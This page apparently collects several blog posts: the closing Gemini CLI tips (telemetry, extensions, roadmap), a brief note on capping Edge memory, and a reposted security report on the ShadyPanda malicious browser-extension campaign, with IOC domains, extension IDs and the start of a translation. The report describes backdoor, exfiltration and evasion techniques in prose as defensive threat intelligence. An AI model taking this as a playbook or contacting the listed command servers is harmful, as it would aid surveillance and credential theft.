By default, telemetry is off (Gemini respects privacy and performance). You can opt-in by setting "telemetry.enabled": true in your settings.json or by starting Gemini CLI with the flag --telemetry. Additionally, you choose the target for the telemetry data: it can be logged locally or sent to a backend like Google Cloud. For a quick start, you might set "telemetry.target": "local" - with this, Gemini will simply write telemetry data to a local file (by default) or to a custom path you specify via "outfile" (https://google-gemini.github.io/gemini-cli/docs/cli/telemetry.html). The local telemetry includes JSON logs you can parse or feed into tools. For more robust monitoring, set "target": "gcp" (Google Cloud) or even integrate with other OpenTelemetry-compatible systems like Jaeger or Datadog. In fact, Gemini CLI’s OTEL support is vendor-neutral - you can export data to just about any observability stack you prefer (Google Cloud Operations, Prometheus, etc.). Google provides a streamlined path for Cloud: if you point to GCP, the CLI can send data directly to Cloud Logging and Cloud Monitoring in your project, where you can use the usual dashboards and alerting tools.
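As a hedged sketch, the opt-in described above could be scripted like this. It assumes the dotted names map to a nested "telemetry" object in settings.json (verify against the telemetry docs for your version), and the output path is hypothetical:

```python
import json


def with_local_telemetry(settings, outfile):
    """Return a copy of settings with telemetry enabled and logged to outfile."""
    updated = dict(settings)
    # Assumption: "telemetry.enabled" etc. live under a nested "telemetry" object.
    telemetry = dict(updated.get("telemetry", {}))
    telemetry.update({"enabled": True, "target": "local", "outfile": outfile})
    updated["telemetry"] = telemetry
    return updated


# Hypothetical existing settings and output path, for illustration only.
current = {"theme": "GitHub"}
print(json.dumps(with_local_telemetry(current, ".gemini/telemetry.log"), indent=2))
```

The function leaves the input dict untouched, so you can diff the result against your current settings.json before writing it back.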

What kind of insights can you get? The telemetry captures events like tool executions, errors, and important milestones. It also records metrics such as prompt processing time and token counts per prompt. For usage analytics, you might aggregate how many times each slash command is used across your team, or how often code generation is invoked. For performance monitoring, you could track if responses have gotten slower, which might indicate hitting API rate limits or model changes. And for debugging, you can see errors or exceptions thrown by tools (e.g., a run_shell_command failure) logged with context. All this data can be visualized if you send it to a platform like Google Cloud’s Monitoring - for example, you can create a dashboard of “tokens used per day” or “error rate of tool X”. It essentially gives you a window into the AI’s “brain” and your usage, which is especially helpful in enterprise settings to ensure everything runs smoothly.

Enabling telemetry does introduce some overhead (extra data processing), so you might not keep it on 100% of the time for personal use. However, it’s fantastic for debugging sessions or for intermittent health checks. One approach is to enable it on a CI server or in your team’s shared environment to collect stats, while leaving it off locally unless needed. Remember, you can always toggle it: update settings.json and restart Gemini CLI, or start it with the --telemetry flag. Also, all telemetry is under your control - it respects your environment variables for endpoint and credentials, so data goes only where you intend it to. This feature turns Gemini CLI from a black box into an observatory, shining light on how the AI agent interacts with your world, so you can continuously improve that interaction.

Pro Tip: If you just want a quick view of your current session’s stats (without full telemetry), use the /stats command. It will output metrics like token usage and session length right in the CLI. This is a lightweight way to see immediate numbers. But for long-term or multi-session analysis, telemetry is the way to go. And if you’re sending telemetry to a cloud project, consider setting up dashboards or alerts (e.g., alert if error rate spikes or token usage hits a threshold) - this can proactively catch issues in how Gemini CLI is being used in your team.

Tip 27: Keep an Eye on the Roadmap (Background Agents & More)

Quick use-case: Stay informed about upcoming Gemini CLI features - by following the public Gemini CLI roadmap, you’ll know about major planned enhancements (like background agents for long-running tasks) before they arrive, allowing you to plan and give feedback.

Gemini CLI is evolving rapidly, with new releases coming out frequently, so it’s wise to track what’s on the horizon. Google maintains a public roadmap for Gemini CLI on GitHub, detailing the key focus areas and features targeted for the near future. This is essentially a living document (and set of issues) where you can see what the developers are working on and what’s in the pipeline. For instance, one exciting item on the roadmap is support for background agents - the ability to spawn autonomous agents that run in the background to handle tasks continuously or asynchronously. According to the roadmap discussion, these background agents would let you delegate long-running processes to Gemini CLI without tying up your interactive session. You could, say, start a background agent that monitors your project for certain events or periodically executes tasks, either on your local machine or even by deploying to a service like Cloud Run. This feature aims to “enable long-running, autonomous tasks and proactive assistance” right from the CLI, essentially extending Gemini CLI’s usefulness beyond just on-demand queries.

By keeping tabs on the roadmap, you’ll also learn about other planned features. These could include new tool integrations, support for additional Gemini model versions, UI/UX improvements, and more. The roadmap is usually organized by “areas” (for example, Extensibility, Model, Background, etc.) and often tagged with milestones (like a target quarter for delivery). It’s not a guarantee of when something will land, but it gives a good idea of the team’s priorities. Since the project is open-source, you can even dive into the linked GitHub issues for each roadmap item to see design proposals and progress. For developers who rely on Gemini CLI, this transparency means you can anticipate changes - maybe an API is adding a feature you need, or a breaking change might be coming that you want to prepare for.

Following the roadmap can be as simple as bookmarking the GitHub project board or issue labeled “Roadmap” and checking periodically. Some major updates (like the introduction of Extensions or the IDE integration) were hinted at in the roadmap before they were officially announced, so you get a sneak peek. Additionally, the Gemini CLI team often encourages community feedback on those future features. If you have ideas or use cases for something like background agents, you can usually comment on the issue or discussion thread to influence its development.

Pro Tip: Since Gemini CLI is open source (Apache 2.0 licensed), you can do more than just watch the roadmap - you can participate! The maintainers welcome contributions, especially for items aligned with the roadmap. If there’s a feature you really care about, consider contributing code or testing once it’s in preview. At the very least, you can open a feature request if something you need isn’t on the roadmap yet. The roadmap page itself provides guidance on how to propose changes. Engaging with the project not only keeps you in the loop but also lets you shape the tool that you use. After all, Gemini CLI is built with community involvement in mind, and many recent features (like certain extensions and tools) started as community suggestions.

Tip 28: Extend Gemini CLI with `Extensions`

Quick use-case: Add new capabilities to Gemini CLI by installing plug-and-play extensions - for example, integrate with your favorite database or cloud service - expanding the AI’s toolset without any heavy lifting on your part. It’s like installing apps for your CLI to teach it new tricks.

Extensions are a game-changer introduced in late 2025: they allow you to customize and expand Gemini CLI’s functionality in a modular way. An extension is essentially a bundle of configurations (and optionally code) that connects Gemini CLI to an external tool or service. For instance, Google released a suite of extensions for Google Cloud - there’s one that helps deploy apps to Cloud Run, one for managing BigQuery, one for analyzing application security, and more. Partners and community developers have built extensions for all sorts of things: Dynatrace (monitoring), Elastic (search analytics), Figma (design assets), Shopify, Snyk (security scans), Stripe (payments), and the list is growing. By installing an appropriate extension, you instantly grant Gemini CLI the ability to use new domain-specific tools. The beauty is that these extensions come with a pre-defined “playbook” that teaches the AI how to use the new tools effectively. That means once installed, you can ask Gemini CLI to perform tasks with those services and it will know the proper APIs or commands to invoke, as if it had that knowledge built-in.

Using extensions is very straightforward. The CLI has a command to manage them: gemini extensions install, followed by the extension’s source. Typically, you provide the URL of the extension’s GitHub repo or a local path, and the CLI will fetch and install it. For example, to install an official extension, you might run: gemini extensions install https://github.com/google-gemini/gemini-cli-extension-cloud-run. Within seconds, the extension is added to your environment (stored under ~/.gemini/extensions/ or your project’s .gemini/extensions/ folder). You can then see it by running /extensions in the CLI, which lists active extensions. From that point on, the AI has new tools at its disposal. If it’s a Cloud Run extension, you could say “Deploy my app to Cloud Run,” and Gemini CLI will actually be able to execute that (by calling the underlying gcloud commands through the extension’s tools). Essentially, extensions function as first-class expansions of Gemini CLI’s capabilities, but you opt-in to the ones you need.

There’s an open ecosystem around extensions. Google has an official Extensions page listing available extensions, and because the framework is open, anyone can create and share their own. If you have a particular internal API or workflow, you can build an extension for it so that Gemini CLI can assist with it. Writing an extension is easier than it sounds: you typically create a directory (say, my-extension/) with a file gemini-extension.json describing what tools or context to add. You might define new slash commands or specify remote APIs the AI can call. No need to modify Gemini CLI’s core - just drop in your extension. The CLI is designed to load these at runtime. Many extensions consist of adding custom MCP tools (Model Context Protocol servers or functions) that the AI can use. For example, an extension could add a /translate command by hooking into an external translation API; once installed, the AI knows how to use /translate. The key benefit is modularity: you install only the extensions you want, keeping the CLI lightweight, but you have the option to integrate virtually anything.
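For a feel of how small an extension can be, the sketch below builds a minimal manifest in Python. The field names (name, version, contextFileName) are assumptions based on the extension format and should be checked against the Extensions Guide; my-extension is the placeholder name from the paragraph above:

```python
import json


def build_manifest(name, version="0.1.0", context_file="GEMINI.md"):
    """Return a minimal manifest dict for a hypothetical extension."""
    return {
        "name": name,
        "version": version,
        # Assumed field: a context file bundled with the extension.
        "contextFileName": context_file,
    }


manifest = build_manifest("my-extension")
print(json.dumps(manifest, indent=2))
```

Saving the printed JSON as my-extension/gemini-extension.json gives you a starting point that you can extend with tool definitions later.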

To manage extensions, besides the install command, you can update or remove them via similar CLI commands (gemini extensions update or just by removing the folder). It’s wise to occasionally check for updates on extensions you use, as they may receive improvements. The CLI might introduce an “extensions marketplace” style interface in the future, but for now, exploring the GitHub repositories and official catalog is the way to discover new ones. Some popular ones at launch include the GenAI Genkit extension (for building generative AI apps), and a variety of Google Cloud extensions that cover CI/CD, database admin, and more.

Pro Tip: If you’re building your own extension, start by looking at existing ones for examples. The official documentation provides an Extensions Guide with the schema and capabilities. A simple way to create a private extension is to use the @include functionality in GEMINI.md to inject scripts or context, but a full extension gives you more power (like packaging tools). Also, since extensions can include context files, you can use them to preload domain knowledge. Imagine an extension for your company’s internal API that includes a summary of the API and a tool to call it - the AI would then know how to handle requests related to that API. In short, extensions open up a new world where Gemini CLI can interface with anything. Keep an eye on the extensions marketplace for new additions, and don’t hesitate to share any useful extension you create with the community - you might just help thousands of other developers.

Additional Fun: Corgi Mode Easter Egg 🐕

Lastly, not a productivity tip but a delightful easter egg - try the command /corgi in Gemini CLI. This toggles “corgi mode”, which makes a cute corgi animation run across your terminal! It doesn’t help you code any better, but it can certainly lighten the mood during a long coding session. You’ll see an ASCII art corgi dashing in the CLI interface. To turn it off, just run /corgi again.

This is a purely for-fun feature the team added (and yes, there’s even a tongue-in-cheek debate about spending dev time on corgi mode). It shows that the creators hide some whimsy in the tool. So when you need a quick break or a smile, give /corgi a try. 🐕🎉

(Rumor has it there might be other easter eggs or modes - who knows? Perhaps a “/partyparrot” or similar. The cheat sheet or help command lists /corgi, so it’s not a secret, just underused. Now you’re in on the joke!)

Conclusion:

We’ve covered a comprehensive list of pro tips and features for Gemini CLI. From setting up persistent context with GEMINI.md, to writing custom commands and using advanced tools like MCP servers, to leveraging multi-modal inputs and automating workflows, there’s a lot this AI command-line assistant can do. As an external developer, you can integrate Gemini CLI into your daily routine - it’s like a powerful ally in your terminal that can handle tedious tasks, provide insights, and even troubleshoot your environment.

Gemini CLI is evolving rapidly (being open-source with community contributions), so new features and improvements are constantly on the horizon. By mastering the pro tips in this guide, you’ll be well-positioned to harness the full potential of this tool. It’s not just about using an AI model - it’s about integrating AI deeply into how you develop and manage software.

Happy coding with Gemini CLI, and have fun exploring just how far your “AI agent in the terminal” can take you.

You now have a Swiss-army knife of AI at your fingertips - use it wisely, and it will make you a more productive (and perhaps happier) developer!

Original

Original on GitHub: gemini-cli-tips
Chinese translation repository: https://github.com/yiGmMk/gemini-cli-tips

Limiting Microsoft Edge's memory usage

2025-12-04T16:00:00.000Z

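Edge often uses a large amount of memory. Recent versions of Edge let you cap how much memory it may use.

Steps

Adjust the memory usage setting

In recent versions of Microsoft Edge you can set the browser's memory limit manually:
Open Edge and click the three dots (menu) in the upper-right corner.

Select "Settings", then under "System and performance" find the "Enable resource controls" option in the Performance section and limit Edge's memory usage, for example to a value between 1 GB and 16 GB.

For the option that controls when the limit applies, choose "Always".

Screenshot

If the setting shown below is missing, update Edge and try again.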

(Repost) 4.3 Million Browsers Infected: Inside ShadyPanda's 7-Year Malware Campaign

2025-12-01T16:00:00.000Z

Intro

Koi researchers have identified a threat actor we’re calling ShadyPanda - responsible for a seven-year browser extension campaign that has infected 4.3 million Chrome and Edge users.

Our investigation uncovered two active operations:

A 300,000-user RCE backdoor: Five extensions, including the “Featured” and “Verified” Clean Master, were weaponized in mid-2024 after years of legitimate operation. These extensions now run hourly remote code execution - downloading and executing arbitrary JavaScript with full browser access. They monitor every website visit, exfiltrate encrypted browsing history, and collect complete browser fingerprints.
A 4-million-user spyware operation: Five additional extensions from the same publisher, including WeTab with 3 million installs alone, are actively collecting every URL visited, search query, and mouse click - transmitting data to servers in China.

Some of ShadyPanda’s extensions were featured and verified by Google, granting instant trust and massive distribution. For seven years, this actor learned how to weaponize browser marketplaces - building trust, accumulating users, and striking through silent updates.

Phase 1: The Wallpaper Hustle (145 Extensions)

ShadyPanda’s first campaign was straightforward but massive, and took place during 2023. 145 extensions total across both marketplaces - 20 on Chrome Web Store under publisher nuggetsno15, and 125 on Microsoft Edge under publisher rocket Zhang. All disguised as wallpaper or productivity apps.

The attack was simple affiliate fraud. Every time a user clicked on eBay, Amazon, or Booking.com, ShadyPanda’s extensions silently injected affiliate tracking codes. Hidden commissions on every purchase. The extensions also deployed Google Analytics tracking to monetize browsing data - every website visit, search query, and click pattern logged and sold.

This phase wasn’t sophisticated, but it was successful. ShadyPanda learned three critical lessons:

Chrome’s review process focused on initial submission, not ongoing behavior
Users trust extensions with high install counts and positive reviews
Patience pays off - some extensions operated for months before detection. The longer you look legitimate, the more damage you can do.

Phase 2: Search Hijacking Evolution

ShadyPanda got bolder. The next wave, in early 2024, shifted from passive monetization to active browser control.

The Infinity V+ extension exemplifies this phase. Disguised as a new tab productivity tool, it hijacked core browser functionality:

Search redirection: Every web search was redirected through trovi.com - a known browser hijacker. Search queries logged, monetized, and sold. Search results manipulated for profit.
Cookie exfiltration: Extensions read cookies from specific domains and sent tracking data to nossl.dergoodting.com, creating unique identifiers to monitor browsing activity. All without consent or disclosure.
Search query harvesting: Every keystroke in the search box sent to external servers (s-85283.gotocdn[.]com and s-82923.gotocdn[.]com). Real-time profiling of user interests before you even hit enter. The extension captures partial queries, typos, corrections - building a detailed map of your thought process. All transmitted over unencrypted HTTP connections, making the data easy to intercept and monetize. Not just what you search for, but how you think about searching for it.

ShadyPanda was learning and getting more aggressive. But they were still getting caught. Extensions were being reported and removed within weeks or months of deployment.

They needed a better strategy.

Phase 3: The Long Game

Five extensions. Three uploaded in 2018-2019 - including Clean Master with 200,000+ installs. All operated legitimately for years, gaining Featured and Verified status.

The strategy: build trust, accumulate users, then weaponize via a single update.

Before weaponization, ShadyPanda deployed covert installation tracking to optimize distribution. Data-driven malware development.

Mid 2024: After accumulating 300,000+ installs, ShadyPanda pushed the malicious update. Automatic infection via Chrome and Edge’s trusted auto-update mechanism. All five extensions now run identical malware.

Remote Code Execution: The Hourly Weapon

Every infected browser runs a remote code execution framework. Every hour, it checks api.extensionplay[.]com for new instructions, downloads arbitrary JavaScript, and executes it with full browser API access.

This isn’t malware with a fixed function. It’s a backdoor. ShadyPanda decides what it does. Today it’s surveillance, tomorrow it could be ransomware, credential theft, or corporate espionage. The update mechanism runs automatically, hourly, forever.

Complete Browser Surveillance

The current payload monitors every website visit and exfiltrates encrypted data to ShadyPanda’s servers:

What gets collected and exfiltrated:

Every URL visited with full browsing history
HTTP referrers showing navigation patterns
Timestamps for activity profiling
Persistent UUID4 identifiers (stored in chrome.storage.sync, survives across devices)
Complete browser fingerprints: user agent, language, platform, screen resolution, timezone
All data encrypted with AES before sending to api.cleanmasters.store

Evasion & Attack Capabilities

Anti-analysis: If a researcher opens developer tools, the malware detects it and switches to benign behavior. The code uses heavy obfuscation with shortened variable names and executes through a 158KB JavaScript interpreter to bypass Content Security Policy.
Man-in-the-Middle: Service worker can intercept and modify network traffic, replace legitimate JavaScript files with malicious versions, enabling credential theft, session hijacking, and content injection into any website - even HTTPS connections.

ShadyPanda can update any of these capabilities hourly. Even though the extensions were recently removed from marketplaces, the infrastructure for full-scale attacks remains deployed on all infected browsers.

Phase 4: The Spyware Empire (5 Extensions, 4M+ Users)

However, ShadyPanda’s biggest operation wasn’t Clean Master. The same publisher behind Clean Master in Edge - Starlab Technology - launched 5 additional extensions on Microsoft Edge around 2023, accumulating over 4 million combined installs.

And here’s the problem: ALL 5 extensions are still live in the Microsoft Edge marketplace. Unlike Phase 3’s removed extensions, this 4-million-user surveillance operation is active right now.

Two of the five are comprehensive spyware. The flagship, WeTab 新标签页 (WeTab New Tab Page), has 3 million installs alone and functions as a sophisticated surveillance platform disguised as a productivity tool.

Comprehensive Data Collection

WeTab collects and exfiltrates extensive user data to 17 different domains (8 Baidu servers in China, 7 WeTab servers in China, and Google Analytics):

What gets collected:

Every URL visited - complete browsing history transmitted in real-time
All search queries - keystroke-level monitoring of what users search for
Mouse click tracking with pixel-level precision - X/Y coordinates and element identification
Browser fingerprinting - screen resolution, language, timezone, user agent
Page interaction data - time on page, scroll behavior, active viewing time
Storage access - reads localStorage, sessionStorage, and can access all cookies

Phase 4 dwarfs the Clean Master operation: 4 million infected users versus 300,000. The extensions remain live in the Microsoft Edge marketplace. They already hold dangerous permissions, including access to all URLs and cookies, and users are downloading them right now. ShadyPanda can push updates at any time, weaponizing 4 million browsers with the same RCE backdoor framework from Phase 3, or something even worse. The infrastructure is in place. The permissions are granted. The update mechanism works automatically.

Seven Years of Exploitation

ShadyPanda’s success isn’t just about technical sophistication. It’s about systematically exploiting the same vulnerability for seven years: Marketplaces review extensions at submission. They don’t watch what happens after approval.

What linked all these campaigns together: code signing similarities, overlapping infrastructure, identical obfuscation techniques evolving over time. Same actor. Different masks. Each phase learned from the last - from crude affiliate fraud to patient five-year operations.

The auto-update mechanism - designed to keep users secure - became the attack vector. Chrome and Edge’s trusted update pipeline silently delivered malware to users. No phishing. No social engineering. Just trusted extensions with quiet version bumps that turned productivity tools into surveillance platforms.

ShadyPanda controls what happens next: session hijacking, credential harvesting, account takeover, supply chain attacks through compromised developers. For enterprises, infected developer workstations mean compromised repositories and stolen API keys. Browser-based authentication to SaaS platforms, cloud consoles, and internal tools means every login is visible to ShadyPanda. Extensions bypass traditional security controls. ShadyPanda has been inside your network for over a year.

The systemic problem isn’t just one malicious actor. It’s that the security model incentivizes this behavior:

Build something legitimate
Pass review and gain trust signals (installs, reviews, verified badges)
Collect large user base
Weaponize via update
Profit before detection

ShadyPanda proved this works. And now every sophisticated threat actor knows the playbook.

Final Thoughts

One patient threat actor and one lesson: Trust is the vulnerability.

ShadyPanda proved that marketplaces still review extensions the same way they did seven years ago - static analysis at submission, trust after approval, no ongoing monitoring. Clean Master operated legitimately for five years. Static analysis wouldn’t catch this.

This writeup was authored by the research team at Koi Security.

We’ve built Koi for this moment. Behavioral analysis and risk scoring for everything your teams pull from marketplaces. We watch what extensions do after installation, not what they claim to be.

IOCs

C&C Domains:

extensionplay[.]com
yearnnewtab[.]com
api.cgatgpt[.]net

Exfiltration Domains:

dergoodting[.]com
yearnnewtab[.]com
cleanmasters[.]store
s-85283.gotocdn[.]com
s-82923.gotocdn[.]com
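
The domains above are written in defanged form (`[.]` instead of `.`). As a minimal sketch of how they could be matched against hostnames from a proxy or DNS log, the Python below turns each indicator back into a normal domain and checks for an exact or subdomain match. The function names and the sample hostnames are hypothetical and only serve as illustration; the indicator list is copied from the two lists above.

```python
def refang(indicator: str) -> str:
    """Turn a defanged indicator such as 'example[.]com' into 'example.com'."""
    return indicator.replace("[.]", ".").lower()


def matches_ioc(hostname: str, indicators: list[str]) -> bool:
    """Return True if hostname equals an indicator or is a subdomain of one."""
    host = hostname.lower().rstrip(".")
    for indicator in indicators:
        domain = refang(indicator)
        if host == domain or host.endswith("." + domain):
            return True
    return False


# Indicators copied from the C&C and exfiltration lists in this post.
IOC_DOMAINS = [
    "extensionplay[.]com",
    "yearnnewtab[.]com",
    "api.cgatgpt[.]net",
    "dergoodting[.]com",
    "cleanmasters[.]store",
    "s-85283.gotocdn[.]com",
    "s-82923.gotocdn[.]com",
]

if __name__ == "__main__":
    # Sample hostnames; the last one is an unrelated placeholder.
    for host in ["api.extensionplay.com", "nossl.dergoodting.com", "example.org"]:
        print(host, matches_ioc(host, IOC_DOMAINS))
```

Matching on a leading dot avoids flagging unrelated domains that merely end with the same characters.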

Chrome Extensions:

eagiakjmjnblliacokhcalebgnhellfi
ibiejjpajlfljcgjndbonclhcbdcamai
ogjneoecnllmjcegcfpaamfpbiaaiekh
jbnopeoocgbmnochaadfnhiiimfpbpmf
cdgonefipacceedbkflolomdegncceid
gipnpcencdgljnaecpekokmpgnhgpela
bpgaffohfacaamplbbojgbiicfgedmoi
ineempkjpmbdejmdgienaphomigjjiej
nnnklgkfdfbdijeeglhjfleaoagiagig
Mljmfnkjmcdmongjnnnbbnajjdbojoci
llkncpcdceadgibhbedecmkencokjajg
nmfbniajnpceakchicdhfofoejhgjefb
ijcpbhmpbaafndchbjdjchogaogelnjl
olaahjgjlhoehkpemnfognpgmkbedodk
gnhgdhlkojnlgljamagoigaabdmfhfeg
cihbmmokhmieaidfgamioabhhkggnehm
lehjnmndiohfaphecnjhopgookigekdk
hlcjkaoneihodfmonjnlnnfpdcopgfjk
hmhifpbclhgklaaepgbabgcpfgidkoei
lnlononncfdnhdfmgpkdfoibmfdehfoj
nagbiboibhbjbclhcigklajjdefaiidc
ofkopmlicnffaiiabnmnaajaimmenkjn
ocffbdeldlbilgegmifiakciiicnoaeo
eaokmbopbenbmgegkmoiogmpejlaikea
lhiehjmkpbhhkfapacaiheolgejcifgd
ondhgmkgppbdnogfiglikgpdkmkaiggk
imdgpklnabbkghcbhmkbjbhcomnfdige

Edge Add-ons:

bpelnogcookhocnaokfpoeinibimbeff
enkihkfondbngohnmlefmobdgkpmejha
hajlmbnnniemimmaehcefkamdadpjlfa
aadnmeanpbokjjahcnikajejglihibpd
ipnidmjhnoipibbinllilgeohohehabl
fnnigcfbmghcefaboigkhfimeolhhbcp
nlcebdoehkdiojeahkofcfnolkleembf
fhababnomjcnhmobbemagohkldaeicad
nokknhlkpdfppefncfkdebhgfpfilieo
ljmcneongnlaecabgneiippeacdoimaa
onifebiiejdjncjpjnojlebibonmnhog
dbagndmcddecodlmnlcmhheicgkaglpk
fmgfcpjmmapcjlknncjgmbolgaecngfo
kgmlodoegkmpfkbepkfhgeldidodgohd
hegpgapbnfiibpbkanjemgmdpmmlecbc
gkanlgbbnncfafkhlchnadcopcgjkfli
oghgaghnofhhoolfneepjneedejcpiic
fcidgbgogbfdcgijkcfdjcagmhcelpbc
nnceocbiolncfljcmajijmeakcdlffnh
domfmjgbmkckapepjahpedlpdedmckbj
cbkogccidanmoaicgphipbdofakomlak
bmlifknbfonkgphkpmkeoahgbhbdhebh
ghaggkcfafofhcfppignflhlocmcfimd
hfeialplaojonefabmojhobdmghnjkmf
boiciofdokedkpmopjnghpkgdakmcpmb
ibfpbjfnpcgmiggfildbcngccoomddmj
idjhfmgaddmdojcfmhcjnnbhnhbmhipd
jhgfinhjcamijjoikplacnfknpchndgb
cgjgmbppcoolfkbkjhoogdpkboohhgel
afooldonhjnhddgnfahlepchipjennab
fkbcbgffcclobgbombinljckbelhnpif
fpokgjmlcemklhmilomcljolhnbaaajk
hadkldcldaanpomhhllacdmglkoepaed
iedkeilnpbkeecjpmkelnglnjpnacnlh
hjfmkkelabjoojjmjljidocklbibphgl
dhjmmcjnajkpnbnbpagglbbfpbacoffm
cgehahdmoijenmnhinajnojmmlnipckl
fjigdpmfeomndepihcinokhcphdojepm
chmcepembfffejphepoongapnlchjgil
googojfbnbhbbnpfpdnffnklipgifngn
fodcokjckpkfpegbekkiallamhedahjd
igiakpjhacibmaichhgbagdkjmjbnanl
omkjakddaeljdfgekdjebbbiboljnalk
llilhpmmhicmiaoancaafdgganakopfg
nemkiffjklgaooligallbpmhdmmhepll
papedehkgfhnagdiempdbhlgcnioofnd
glfddenhiaacfmhoiebfeljnfkkkmbjb
pkjfghocapckmendmgdmppjccbplccbg
gbcjipmcpedgndgdnfofbhgnkmghoamm
ncapkionddmdmfocnjfcfpnimepibggf
klggeioacnkkpdcnapgcoicnblliidmf
klgjbnheihgnmimajhohfcldhfpjnahe
acogeoajdpgplfhidldckbjkkpgeebod
ekndlocgcngbpebppapnpalpjfnkoffh
elckfehnjdbghpoheamjffpdbbogjhie
dmpceopfiajfdnoiebfankfoabfehdpn
gpolcigkhldaighngmmmcjldkkiaonbg
dfakjobhimnibdmkbgpkijoihplhcnil
hbghbdhfibifdgnbpaogepnkekonkdgc
fppchnhginnfabgenhihpncnphhafmac
ghhddclfklljabeodmcejjjlhoaaiban
bppelgkcnhfkicolffhlkbdghdnjdkhi
ikgaleggljchgbihlaanjbkekmmgccam
bdhjinjoglaijpffoamhhnhooeimgoap
fjioinpkgmlcioajfnncgldldcnabffe
opncjjhgbllenobgbfjbblhghmdpmpbj
cbijiaccpnkbdpgbmiiipedpepbhioel
fbbmnieefocnacnecccgmedmcbhlkcpm
hmbacpfgehmmoloinfmkgkpjoagiogai
paghkadkhiladedijgodgghaajppmpcg
bafbmfpfepdlgnfkgfbobplkkaoakjcl
kcpkoopmfjhdpgjohcbgkbjpmbjmhgoi
jelgelidmodjpmohbapbghdgcpncahki
lfgakdlafdenmaikccbojgcofkkhmolj
hdfknlljfbdfjdjhfgoonpphpigjjjak
kpfbijpdidioaomoecdbfaodhajbcjfl
fckphkcbpgmappcgnfieaacjbknhkhin
lhfdakoonenpbggbeephofdlflloghhi
ljjngehkphcdnnapgciajcdbcpgmpknc
ejfocpkjndmkbloiobcdhkkoeekcpkik
ccdimkoieijdbgdlkfjjfncmihmlpanj
agdlpnhabjfcbeiempefhpgikapcapjb
mddfnhdadbofiifdebeiegecchpkbgdb
alknmfpopohfpdpafdmobclioihdkhjh
hlglicejgohbanllnmnjllajhmnhjjel
iaccapfapbjahnhcmkgjjonlccbhdpjl
ehmnkbambjnodfbjcebjffilahbfjdml
ngbfciefgjgijkkmpalnmhikoojilkob
laholcgeblfbgdhkbiidbpiofdcbpeeo
njoedigapanaggiabjafnaklppphempm
fomlombffdkflbliepgpgcnagolnegjn
jpoofbjomdefajdjcimmaoildecebkjc
nhdiopbebcklbkpfnhipecgfhdhdbfhb
gdnhikbabcflemolpeaaknnieodgpiie
bbdioggpbhhodagchciaeaggdponnhpa
ikajognfijokhbgjdhgpemljgcjclpmn
lmnjiioclbjphkggicmldippjojgmldk
ffgihbmcfcihmpbegcfdkmafaplheknk
lgnjdldkappogbkljaiedgogobcgemch
hiodlpcelfelhpinhgngoopbmclcaghd
mnophppbmlnlfobakddidbcgcjakipin
jbajdpebknffiaenkdhopebkolgdlfaf
ejdihbblcbdfobabjfebfjfopenohbjb
ikkoanocgpdmmiamnkogipbpdpckcahn
ileojfedpkdbkcchpnghhaebfoimamop
akialmafcdmkelghnomeneinkcllnoih
eholblediahnodlgigdkdhkkpmbiafoj
ipokalojgdmhfpagmhnjokidnpjfnfik
hdpmmcmblgbkllldbccfdejchjlpochf
iphacjobmeoknlhenjfiilbkddgaljad
jiiggekklbbojgfmdenimcdkmidnfofl
gkhggnaplpjkghjjcmpmnmidjndojpcn
opakkgodhhongnhbdkgjgdlcbknacpaa
nkjomoafjgemogbdkhledkoeaflnmgfi
ebileebbekdcpfjlekjapgmbgpfigled
oaacndacaoelmkhfilennooagoelpjop
ljkgnegaajfacghepjiajibgdpfmcfip
hgolomhkdcpmbgckhebdhdknaemlbbaa
bboeoilakaofjkdmekpgeigieokkpgfn
dkkpollfhjoiapcenojlmgempmjekcla
emiocjgakibimbopobplmfldkldhhiad
nchdmembkfgkejljapneliogidkchiop
lljplndkobdgkjilfmfiefpldkhkhbbd
hofaaigdagglolgiefkbencchnekjejl
hohobnhiiohgcipklpncfmjkjpmejjni
jocnjcakendmllafpmjailfnlndaaklf
bjdclfjlhgcdcpjhmhfggkkfacipilai
ahebpkbnckhgjmndfjejibjjahjdlhdb
enaigkcpmpohpbokbfllbkijmllmpafm
bpngofombcjloljkoafhmpcjclkekfbh
cacbflgkiidgcekflfgdnjdnaalfmkob
ibmgdfenfldppaodbahpgcoebmmkdbac
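
One way to use the ID lists above is to compare them with the extensions installed in a browser profile. Chromium-based browsers keep each installed extension in a folder named after its ID inside the profile's `Extensions` directory, so a rough check is a set intersection. This is only a sketch: the function name is made up, the profile path in the usage comment is an example that differs per OS and browser, and `FLAGGED_IDS` holds just two IDs from the lists as a sample.

```python
from pathlib import Path


def find_flagged_extensions(extensions_dir: Path, flagged_ids: set[str]) -> list[str]:
    """Return the flagged IDs that appear as folder names in extensions_dir."""
    if not extensions_dir.is_dir():
        return []
    installed = {p.name.lower() for p in extensions_dir.iterdir() if p.is_dir()}
    return sorted(installed & {i.lower() for i in flagged_ids})


# Sample only: paste the full Chrome and Edge lists from this post here.
FLAGGED_IDS = {
    "eagiakjmjnblliacokhcalebgnhellfi",
    "bpelnogcookhocnaokfpoeinibimbeff",
}

if __name__ == "__main__":
    # Example location for Chrome on Linux; adjust for your OS, browser and profile.
    profile_extensions = Path.home() / ".config/google-chrome/Default/Extensions"
    print(find_flagged_extensions(profile_extensions, FLAGGED_IDS))
```

An empty result only means none of the listed IDs is present in that one profile; other profiles and browsers need their own check.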

Original

(Translation) 4.3 Million Browsers Infected: Inside ShadyPanda's 7-Year Malware Campaign

2025-12-01T16:00:00.000Z

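Introduction

Koi researchers have identified a threat actor dubbed ShadyPanda, which launched and sustained a seven-year browser extension campaign that has infected about 4.3 million Chrome and Edge users.

Our investigation uncovered two operations that are still active:

An RCE (remote code execution) backdoor with about 300,000 users: five extensions were weaponized in mid-2024 after years of legitimate operation, including Clean Master, which had been marked "Featured" and "Verified". These extensions run a remote code execution framework every hour, downloading and executing arbitrary JavaScript with full browser access. They monitor every website visit, exfiltrate encrypted browsing history, and collect complete browser fingerprints.
A spyware operation with about 4 million users: five more extensions from the same publisher (WeTab alone has about 3 million installs) are actively collecting every visited URL, search query, and mouse click, and sending the data to servers in China.

Some of ShadyPanda's extensions were featured and verified by Google, which gave them instant trust and massive distribution. Over seven years, the actor learned how to weaponize browser marketplaces: build trust, accumulate users, and strike through silent updates.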

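Phase 1: The Wallpaper Hustle (145 Extensions)

ShadyPanda's first campaign was simple but massive, and took place during 2023. It comprised 145 extensions across both marketplaces: 20 on the Chrome Web Store under publisher nuggetsno15, and 125 on Microsoft Edge under publisher rocket Zhang. All were disguised as wallpaper or productivity apps.

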